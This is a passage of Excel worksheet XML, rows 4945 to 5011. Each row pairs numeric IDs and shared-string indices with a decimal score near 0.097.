    <row r="4945" ht="15.75" customHeight="1">
      <c r="A4945" s="1">
        <v>10363.0</v>
      </c>
      <c r="B4945" s="2">
        <v>7772284.0</v>
      </c>
      <c r="C4945" s="2" t="s">
        <v>4728</v>
      </c>
      <c r="D4945" s="2">
        <v>1.0</v>
      </c>
      <c r="E4945" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4945" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="4946" ht="15.75" customHeight="1">
      <c r="A4946" s="1">
        <v>1298.0</v>
      </c>
      <c r="B4946" s="2">
        <v>2.5636965E7</v>
      </c>
      <c r="C4946" s="2" t="s">
        <v>4729</v>
      </c>
      <c r="D4946" s="2">
        <v>1.0</v>
      </c>
      <c r="E4946" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4946" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="4947" ht="15.75" customHeight="1">
      <c r="A4947" s="1">
        <v>5590.0</v>
      </c>
      <c r="B4947" s="2">
        <v>4.6098272E7</v>
      </c>
      <c r="C4947" s="2" t="s">
        <v>4730</v>
      </c>
      <c r="D4947" s="2">
        <v>1.0</v>
      </c>
      <c r="E4947" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4947" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="4948" ht="15.75" customHeight="1">
      <c r="A4948" s="1">
        <v>6596.0</v>
      </c>
      <c r="B4948" s="2">
        <v>4.9003146E7</v>
      </c>
      <c r="C4948" s="2" t="s">
        <v>4731</v>
      </c>
      <c r="D4948" s="2">
        <v>1.0</v>
      </c>
      <c r="E4948" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4948" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="4949" ht="15.75" customHeight="1">
      <c r="A4949" s="1">
        <v>7457.0</v>
      </c>
      <c r="B4949" s="2">
        <v>5.1237956E7</v>
      </c>
      <c r="C4949" s="2" t="s">
        <v>4732</v>
      </c>
      <c r="D4949" s="2">
        <v>1.0</v>
      </c>
      <c r="E4949" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4949" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="4950" ht="15.75" customHeight="1">
      <c r="A4950" s="1">
        <v>7729.0</v>
      </c>
      <c r="B4950" s="2">
        <v>5.2034556E7</v>
      </c>
      <c r="C4950" s="2" t="s">
        <v>4733</v>
      </c>
      <c r="D4950" s="2">
        <v>1.0</v>
      </c>
      <c r="E4950" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4950" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="4951" ht="15.75" customHeight="1">
      <c r="A4951" s="1">
        <v>1233.0</v>
      </c>
      <c r="B4951" s="2">
        <v>2.5028465E7</v>
      </c>
      <c r="C4951" s="2" t="s">
        <v>4734</v>
      </c>
      <c r="D4951" s="2">
        <v>1.0</v>
      </c>
      <c r="E4951" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4951" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4952" ht="15.75" customHeight="1">
      <c r="A4952" s="1">
        <v>1526.0</v>
      </c>
      <c r="B4952" s="2">
        <v>2.7426945E7</v>
      </c>
      <c r="C4952" s="2" t="s">
        <v>4735</v>
      </c>
      <c r="D4952" s="2">
        <v>1.0</v>
      </c>
      <c r="E4952" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4952" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4953" ht="15.75" customHeight="1">
      <c r="A4953" s="1">
        <v>1811.0</v>
      </c>
      <c r="B4953" s="2">
        <v>2.9218548E7</v>
      </c>
      <c r="C4953" s="2" t="s">
        <v>4736</v>
      </c>
      <c r="D4953" s="2">
        <v>1.0</v>
      </c>
      <c r="E4953" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4953" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4954" ht="15.75" customHeight="1">
      <c r="A4954" s="1">
        <v>1889.0</v>
      </c>
      <c r="B4954" s="2">
        <v>2.9804492E7</v>
      </c>
      <c r="C4954" s="2" t="s">
        <v>4737</v>
      </c>
      <c r="D4954" s="2">
        <v>1.0</v>
      </c>
      <c r="E4954" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4954" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4955" ht="15.75" customHeight="1">
      <c r="A4955" s="1">
        <v>1980.0</v>
      </c>
      <c r="B4955" s="2">
        <v>3.0443942E7</v>
      </c>
      <c r="C4955" s="2" t="s">
        <v>4738</v>
      </c>
      <c r="D4955" s="2">
        <v>1.0</v>
      </c>
      <c r="E4955" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4955" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4956" ht="15.75" customHeight="1">
      <c r="A4956" s="1">
        <v>2224.0</v>
      </c>
      <c r="B4956" s="2">
        <v>3.2210366E7</v>
      </c>
      <c r="C4956" s="2" t="s">
        <v>4739</v>
      </c>
      <c r="D4956" s="2">
        <v>1.0</v>
      </c>
      <c r="E4956" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4956" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4957" ht="15.75" customHeight="1">
      <c r="A4957" s="1">
        <v>2946.0</v>
      </c>
      <c r="B4957" s="2">
        <v>3.5988328E7</v>
      </c>
      <c r="C4957" s="2" t="s">
        <v>4740</v>
      </c>
      <c r="D4957" s="2">
        <v>1.0</v>
      </c>
      <c r="E4957" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4957" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4958" ht="15.75" customHeight="1">
      <c r="A4958" s="1">
        <v>3617.0</v>
      </c>
      <c r="B4958" s="2">
        <v>3.9178645E7</v>
      </c>
      <c r="C4958" s="2" t="s">
        <v>4741</v>
      </c>
      <c r="D4958" s="2">
        <v>1.0</v>
      </c>
      <c r="E4958" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4958" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4959" ht="15.75" customHeight="1">
      <c r="A4959" s="1">
        <v>4063.0</v>
      </c>
      <c r="B4959" s="2">
        <v>4.1148167E7</v>
      </c>
      <c r="C4959" s="2" t="s">
        <v>4742</v>
      </c>
      <c r="D4959" s="2">
        <v>1.0</v>
      </c>
      <c r="E4959" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4959" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4960" ht="15.75" customHeight="1">
      <c r="A4960" s="1">
        <v>4270.0</v>
      </c>
      <c r="B4960" s="2">
        <v>4.18646E7</v>
      </c>
      <c r="C4960" s="2" t="s">
        <v>4743</v>
      </c>
      <c r="D4960" s="2">
        <v>1.0</v>
      </c>
      <c r="E4960" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4960" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4961" ht="15.75" customHeight="1">
      <c r="A4961" s="1">
        <v>4417.0</v>
      </c>
      <c r="B4961" s="2">
        <v>4.2294059E7</v>
      </c>
      <c r="C4961" s="2" t="s">
        <v>4744</v>
      </c>
      <c r="D4961" s="2">
        <v>1.0</v>
      </c>
      <c r="E4961" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4961" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4962" ht="15.75" customHeight="1">
      <c r="A4962" s="1">
        <v>4997.0</v>
      </c>
      <c r="B4962" s="2">
        <v>4.417758E7</v>
      </c>
      <c r="C4962" s="2" t="s">
        <v>4745</v>
      </c>
      <c r="D4962" s="2">
        <v>1.0</v>
      </c>
      <c r="E4962" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4962" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4963" ht="15.75" customHeight="1">
      <c r="A4963" s="1">
        <v>6724.0</v>
      </c>
      <c r="B4963" s="2">
        <v>4.929213E7</v>
      </c>
      <c r="C4963" s="2" t="s">
        <v>4746</v>
      </c>
      <c r="D4963" s="2">
        <v>1.0</v>
      </c>
      <c r="E4963" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4963" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4964" ht="15.75" customHeight="1">
      <c r="A4964" s="1">
        <v>6830.0</v>
      </c>
      <c r="B4964" s="2">
        <v>4.9596758E7</v>
      </c>
      <c r="C4964" s="2" t="s">
        <v>4747</v>
      </c>
      <c r="D4964" s="2">
        <v>1.0</v>
      </c>
      <c r="E4964" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4964" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4965" ht="15.75" customHeight="1">
      <c r="A4965" s="1">
        <v>7022.0</v>
      </c>
      <c r="B4965" s="2">
        <v>5.0103244E7</v>
      </c>
      <c r="C4965" s="2" t="s">
        <v>4748</v>
      </c>
      <c r="D4965" s="2">
        <v>1.0</v>
      </c>
      <c r="E4965" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4965" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4966" ht="15.75" customHeight="1">
      <c r="A4966" s="1">
        <v>7068.0</v>
      </c>
      <c r="B4966" s="2">
        <v>5.023608E7</v>
      </c>
      <c r="C4966" s="2" t="s">
        <v>4749</v>
      </c>
      <c r="D4966" s="2">
        <v>1.0</v>
      </c>
      <c r="E4966" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4966" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4967" ht="15.75" customHeight="1">
      <c r="A4967" s="1">
        <v>7130.0</v>
      </c>
      <c r="B4967" s="2">
        <v>5.0429594E7</v>
      </c>
      <c r="C4967" s="2" t="s">
        <v>4750</v>
      </c>
      <c r="D4967" s="2">
        <v>1.0</v>
      </c>
      <c r="E4967" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4967" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4968" ht="15.75" customHeight="1">
      <c r="A4968" s="1">
        <v>8017.0</v>
      </c>
      <c r="B4968" s="2">
        <v>5.279855E7</v>
      </c>
      <c r="C4968" s="2" t="s">
        <v>4751</v>
      </c>
      <c r="D4968" s="2">
        <v>1.0</v>
      </c>
      <c r="E4968" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4968" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4969" ht="15.75" customHeight="1">
      <c r="A4969" s="1">
        <v>8332.0</v>
      </c>
      <c r="B4969" s="2">
        <v>5.3676929E7</v>
      </c>
      <c r="C4969" s="2" t="s">
        <v>4752</v>
      </c>
      <c r="D4969" s="2">
        <v>1.0</v>
      </c>
      <c r="E4969" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4969" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4970" ht="15.75" customHeight="1">
      <c r="A4970" s="1">
        <v>8688.0</v>
      </c>
      <c r="B4970" s="2">
        <v>5.4409535E7</v>
      </c>
      <c r="C4970" s="2" t="s">
        <v>4753</v>
      </c>
      <c r="D4970" s="2">
        <v>1.0</v>
      </c>
      <c r="E4970" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4970" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4971" ht="15.75" customHeight="1">
      <c r="A4971" s="1">
        <v>8898.0</v>
      </c>
      <c r="B4971" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C4971" s="2" t="s">
        <v>4754</v>
      </c>
      <c r="D4971" s="2">
        <v>1.0</v>
      </c>
      <c r="E4971" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4971" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4972" ht="15.75" customHeight="1">
      <c r="A4972" s="1">
        <v>9137.0</v>
      </c>
      <c r="B4972" s="2">
        <v>5.5240946E7</v>
      </c>
      <c r="C4972" s="2" t="s">
        <v>4755</v>
      </c>
      <c r="D4972" s="2">
        <v>1.0</v>
      </c>
      <c r="E4972" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4972" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4973" ht="15.75" customHeight="1">
      <c r="A4973" s="1">
        <v>9584.0</v>
      </c>
      <c r="B4973" s="2">
        <v>5.6098708E7</v>
      </c>
      <c r="C4973" s="2" t="s">
        <v>4756</v>
      </c>
      <c r="D4973" s="2">
        <v>1.0</v>
      </c>
      <c r="E4973" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4973" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4974" ht="15.75" customHeight="1">
      <c r="A4974" s="1">
        <v>10245.0</v>
      </c>
      <c r="B4974" s="2">
        <v>5.7536768E7</v>
      </c>
      <c r="C4974" s="2" t="s">
        <v>4757</v>
      </c>
      <c r="D4974" s="2">
        <v>1.0</v>
      </c>
      <c r="E4974" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4974" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4975" ht="15.75" customHeight="1">
      <c r="A4975" s="1">
        <v>10755.0</v>
      </c>
      <c r="B4975" s="2">
        <v>1.5509227E7</v>
      </c>
      <c r="C4975" s="2" t="s">
        <v>4758</v>
      </c>
      <c r="D4975" s="2">
        <v>1.0</v>
      </c>
      <c r="E4975" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4975" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4976" ht="15.75" customHeight="1">
      <c r="A4976" s="1">
        <v>10821.0</v>
      </c>
      <c r="B4976" s="2">
        <v>1.5886947E7</v>
      </c>
      <c r="C4976" s="2" t="s">
        <v>4759</v>
      </c>
      <c r="D4976" s="2">
        <v>1.0</v>
      </c>
      <c r="E4976" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4976" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4977" ht="15.75" customHeight="1">
      <c r="A4977" s="1">
        <v>10899.0</v>
      </c>
      <c r="B4977" s="2">
        <v>1.6619863E7</v>
      </c>
      <c r="C4977" s="2" t="s">
        <v>4760</v>
      </c>
      <c r="D4977" s="2">
        <v>1.0</v>
      </c>
      <c r="E4977" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4977" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4978" ht="15.75" customHeight="1">
      <c r="A4978" s="1">
        <v>11196.0</v>
      </c>
      <c r="B4978" s="2">
        <v>1.9872608E7</v>
      </c>
      <c r="C4978" s="2" t="s">
        <v>4761</v>
      </c>
      <c r="D4978" s="2">
        <v>1.0</v>
      </c>
      <c r="E4978" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4978" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4979" ht="15.75" customHeight="1">
      <c r="A4979" s="1">
        <v>11812.0</v>
      </c>
      <c r="B4979" s="2">
        <v>2.4538581E7</v>
      </c>
      <c r="C4979" s="2" t="s">
        <v>4762</v>
      </c>
      <c r="D4979" s="2">
        <v>1.0</v>
      </c>
      <c r="E4979" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4979" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4980" ht="15.75" customHeight="1">
      <c r="A4980" s="1">
        <v>11862.0</v>
      </c>
      <c r="B4980" s="2">
        <v>2.485744E7</v>
      </c>
      <c r="C4980" s="2" t="s">
        <v>4763</v>
      </c>
      <c r="D4980" s="2">
        <v>1.0</v>
      </c>
      <c r="E4980" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4980" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4981" ht="15.75" customHeight="1">
      <c r="A4981" s="1">
        <v>11935.0</v>
      </c>
      <c r="B4981" s="2">
        <v>2.5496737E7</v>
      </c>
      <c r="C4981" s="2" t="s">
        <v>4764</v>
      </c>
      <c r="D4981" s="2">
        <v>1.0</v>
      </c>
      <c r="E4981" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4981" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4982" ht="15.75" customHeight="1">
      <c r="A4982" s="1">
        <v>12038.0</v>
      </c>
      <c r="B4982" s="2">
        <v>2.6296424E7</v>
      </c>
      <c r="C4982" s="2" t="s">
        <v>4765</v>
      </c>
      <c r="D4982" s="2">
        <v>1.0</v>
      </c>
      <c r="E4982" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4982" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4983" ht="15.75" customHeight="1">
      <c r="A4983" s="1">
        <v>12261.0</v>
      </c>
      <c r="B4983" s="2">
        <v>2.8017419E7</v>
      </c>
      <c r="C4983" s="2" t="s">
        <v>4766</v>
      </c>
      <c r="D4983" s="2">
        <v>1.0</v>
      </c>
      <c r="E4983" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4983" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4984" ht="15.75" customHeight="1">
      <c r="A4984" s="1">
        <v>13017.0</v>
      </c>
      <c r="B4984" s="2">
        <v>3.2907357E7</v>
      </c>
      <c r="C4984" s="2" t="s">
        <v>4767</v>
      </c>
      <c r="D4984" s="2">
        <v>1.0</v>
      </c>
      <c r="E4984" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4984" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4985" ht="15.75" customHeight="1">
      <c r="A4985" s="1">
        <v>13189.0</v>
      </c>
      <c r="B4985" s="2">
        <v>3.4080355E7</v>
      </c>
      <c r="C4985" s="2" t="s">
        <v>4768</v>
      </c>
      <c r="D4985" s="2">
        <v>1.0</v>
      </c>
      <c r="E4985" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4985" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4986" ht="15.75" customHeight="1">
      <c r="A4986" s="1">
        <v>13664.0</v>
      </c>
      <c r="B4986" s="2">
        <v>3.5993322E7</v>
      </c>
      <c r="C4986" s="2" t="s">
        <v>4769</v>
      </c>
      <c r="D4986" s="2">
        <v>1.0</v>
      </c>
      <c r="E4986" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4986" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4987" ht="15.75" customHeight="1">
      <c r="A4987" s="1">
        <v>14769.0</v>
      </c>
      <c r="B4987" s="2">
        <v>4.085327E7</v>
      </c>
      <c r="C4987" s="2" t="s">
        <v>4770</v>
      </c>
      <c r="D4987" s="2">
        <v>1.0</v>
      </c>
      <c r="E4987" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4987" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4988" ht="15.75" customHeight="1">
      <c r="A4988" s="1">
        <v>14959.0</v>
      </c>
      <c r="B4988" s="2">
        <v>4.133099E7</v>
      </c>
      <c r="C4988" s="2" t="s">
        <v>4771</v>
      </c>
      <c r="D4988" s="2">
        <v>1.0</v>
      </c>
      <c r="E4988" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4988" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4989" ht="15.75" customHeight="1">
      <c r="A4989" s="1">
        <v>15340.0</v>
      </c>
      <c r="B4989" s="2">
        <v>4.2611341E7</v>
      </c>
      <c r="C4989" s="2" t="s">
        <v>4772</v>
      </c>
      <c r="D4989" s="2">
        <v>1.0</v>
      </c>
      <c r="E4989" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4989" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4990" ht="15.75" customHeight="1">
      <c r="A4990" s="1">
        <v>15828.0</v>
      </c>
      <c r="B4990" s="2">
        <v>4.431159E7</v>
      </c>
      <c r="C4990" s="2" t="s">
        <v>4773</v>
      </c>
      <c r="D4990" s="2">
        <v>1.0</v>
      </c>
      <c r="E4990" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4990" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4991" ht="15.75" customHeight="1">
      <c r="A4991" s="1">
        <v>17598.0</v>
      </c>
      <c r="B4991" s="2">
        <v>5.0335908E7</v>
      </c>
      <c r="C4991" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="D4991" s="2">
        <v>1.0</v>
      </c>
      <c r="E4991" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4991" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4992" ht="15.75" customHeight="1">
      <c r="A4992" s="1">
        <v>18576.0</v>
      </c>
      <c r="B4992" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C4992" s="2" t="s">
        <v>4775</v>
      </c>
      <c r="D4992" s="2">
        <v>1.0</v>
      </c>
      <c r="E4992" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4992" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4993" ht="15.75" customHeight="1">
      <c r="A4993" s="1">
        <v>21115.0</v>
      </c>
      <c r="B4993" s="2">
        <v>1.8248211E7</v>
      </c>
      <c r="C4993" s="2" t="s">
        <v>4776</v>
      </c>
      <c r="D4993" s="2">
        <v>1.0</v>
      </c>
      <c r="E4993" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4993" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4994" ht="15.75" customHeight="1">
      <c r="A4994" s="1">
        <v>21198.0</v>
      </c>
      <c r="B4994" s="2">
        <v>1.9465719E7</v>
      </c>
      <c r="C4994" s="2" t="s">
        <v>4777</v>
      </c>
      <c r="D4994" s="2">
        <v>1.0</v>
      </c>
      <c r="E4994" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4994" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4995" ht="15.75" customHeight="1">
      <c r="A4995" s="1">
        <v>21962.0</v>
      </c>
      <c r="B4995" s="2">
        <v>2.9059745E7</v>
      </c>
      <c r="C4995" s="2" t="s">
        <v>4778</v>
      </c>
      <c r="D4995" s="2">
        <v>1.0</v>
      </c>
      <c r="E4995" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4995" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4996" ht="15.75" customHeight="1">
      <c r="A4996" s="1">
        <v>23428.0</v>
      </c>
      <c r="B4996" s="2">
        <v>5.6447285E7</v>
      </c>
      <c r="C4996" s="2" t="s">
        <v>4779</v>
      </c>
      <c r="D4996" s="2">
        <v>1.0</v>
      </c>
      <c r="E4996" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4996" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4997" ht="15.75" customHeight="1">
      <c r="A4997" s="1">
        <v>24053.0</v>
      </c>
      <c r="B4997" s="2">
        <v>9573677.0</v>
      </c>
      <c r="C4997" s="2" t="s">
        <v>4780</v>
      </c>
      <c r="D4997" s="2">
        <v>1.0</v>
      </c>
      <c r="E4997" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4997" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4998" ht="15.75" customHeight="1">
      <c r="A4998" s="1">
        <v>26814.0</v>
      </c>
      <c r="B4998" s="2">
        <v>1.8740457E7</v>
      </c>
      <c r="C4998" s="2" t="s">
        <v>4781</v>
      </c>
      <c r="D4998" s="2">
        <v>1.0</v>
      </c>
      <c r="E4998" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4998" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="4999" ht="15.75" customHeight="1">
      <c r="A4999" s="1">
        <v>28569.0</v>
      </c>
      <c r="B4999" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C4999" s="2" t="s">
        <v>4782</v>
      </c>
      <c r="D4999" s="2">
        <v>1.0</v>
      </c>
      <c r="E4999" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4999" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5000" ht="15.75" customHeight="1">
      <c r="A5000" s="1">
        <v>30713.0</v>
      </c>
      <c r="B5000" s="2">
        <v>4.3065081E7</v>
      </c>
      <c r="C5000" s="2" t="s">
        <v>4783</v>
      </c>
      <c r="D5000" s="2">
        <v>1.0</v>
      </c>
      <c r="E5000" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5000" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5001" ht="15.75" customHeight="1">
      <c r="A5001" s="1">
        <v>30936.0</v>
      </c>
      <c r="B5001" s="2">
        <v>4.7229808E7</v>
      </c>
      <c r="C5001" s="2" t="s">
        <v>4784</v>
      </c>
      <c r="D5001" s="2">
        <v>1.0</v>
      </c>
      <c r="E5001" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5001" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5002" ht="15.75" customHeight="1">
      <c r="A5002" s="1">
        <v>31164.0</v>
      </c>
      <c r="B5002" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C5002" s="2" t="s">
        <v>4785</v>
      </c>
      <c r="D5002" s="2">
        <v>1.0</v>
      </c>
      <c r="E5002" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5002" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5003" ht="15.75" customHeight="1">
      <c r="A5003" s="1">
        <v>33624.0</v>
      </c>
      <c r="B5003" s="2">
        <v>8356081.0</v>
      </c>
      <c r="C5003" s="2" t="s">
        <v>4786</v>
      </c>
      <c r="D5003" s="2">
        <v>1.0</v>
      </c>
      <c r="E5003" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5003" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5004" ht="15.75" customHeight="1">
      <c r="A5004" s="1">
        <v>33961.0</v>
      </c>
      <c r="B5004" s="2">
        <v>9344067.0</v>
      </c>
      <c r="C5004" s="2" t="s">
        <v>4787</v>
      </c>
      <c r="D5004" s="2">
        <v>1.0</v>
      </c>
      <c r="E5004" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5004" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="5005" ht="15.75" customHeight="1">
      <c r="A5005" s="1">
        <v>2255.0</v>
      </c>
      <c r="B5005" s="2">
        <v>3.2364423E7</v>
      </c>
      <c r="C5005" s="2" t="s">
        <v>4788</v>
      </c>
      <c r="D5005" s="2">
        <v>1.0</v>
      </c>
      <c r="E5005" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5005" s="2">
        <v>0.09748427672955974</v>
      </c>
    </row>
    <row r="5006" ht="15.75" customHeight="1">
      <c r="A5006" s="1">
        <v>12684.0</v>
      </c>
      <c r="B5006" s="2">
        <v>3.0649885E7</v>
      </c>
      <c r="C5006" s="2" t="s">
        <v>4789</v>
      </c>
      <c r="D5006" s="2">
        <v>1.0</v>
      </c>
      <c r="E5006" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5006" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="5007" ht="15.75" customHeight="1">
      <c r="A5007" s="1">
        <v>17572.0</v>
      </c>
      <c r="B5007" s="2">
        <v>5.0261813E7</v>
      </c>
      <c r="C5007" s="2" t="s">
        <v>4790</v>
      </c>
      <c r="D5007" s="2">
        <v>1.0</v>
      </c>
      <c r="E5007" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5007" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="5008" ht="15.75" customHeight="1">
      <c r="A5008" s="1">
        <v>17610.0</v>
      </c>
      <c r="B5008" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C5008" s="2" t="s">
        <v>4791</v>
      </c>
      <c r="D5008" s="2">
        <v>1.0</v>
      </c>
      <c r="E5008" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5008" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="5009" ht="15.75" customHeight="1">
      <c r="A5009" s="1">
        <v>19252.0</v>
      </c>
      <c r="B5009" s="2">
        <v>5.511386E7</v>
      </c>
      <c r="C5009" s="2" t="s">
        <v>4792</v>
      </c>
      <c r="D5009" s="2">
        <v>1.0</v>
      </c>
      <c r="E5009" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5009" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="5010" ht="15.75" customHeight="1">
      <c r="A5010" s="1">
        <v>3164.0</v>
      </c>
      <c r="B5010" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C5010" s="2" t="s">
        <v>4793</v>
      </c>
      <c r="D5010" s="2">
        <v>1.0</v>
      </c>
      <c r="E5010" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5010" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="5011" ht="15.75" customHeight="1">
      <c r="A5011" s="1">
        <v>1627.0</v>
      </c>
      <c r="B5011" s="2">
        <v>2.7978953E7</v>
      </c>
      <c r="C5011" s="2" t="s">
        <v>4794</v>
      </c>
      <c r="D5011" s="2">
        <v>1.0</v>
      </c>
      <c r="E5011" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5011" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
